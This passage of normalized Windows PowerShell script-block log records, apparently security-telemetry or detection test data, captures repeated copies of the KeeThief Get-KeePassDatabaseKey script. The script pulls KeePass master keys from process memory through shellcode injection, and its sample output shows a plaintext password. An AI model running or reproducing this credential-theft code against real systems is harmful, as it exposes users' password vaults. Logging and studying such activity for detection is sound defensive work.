[Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"} -{"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) {\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = 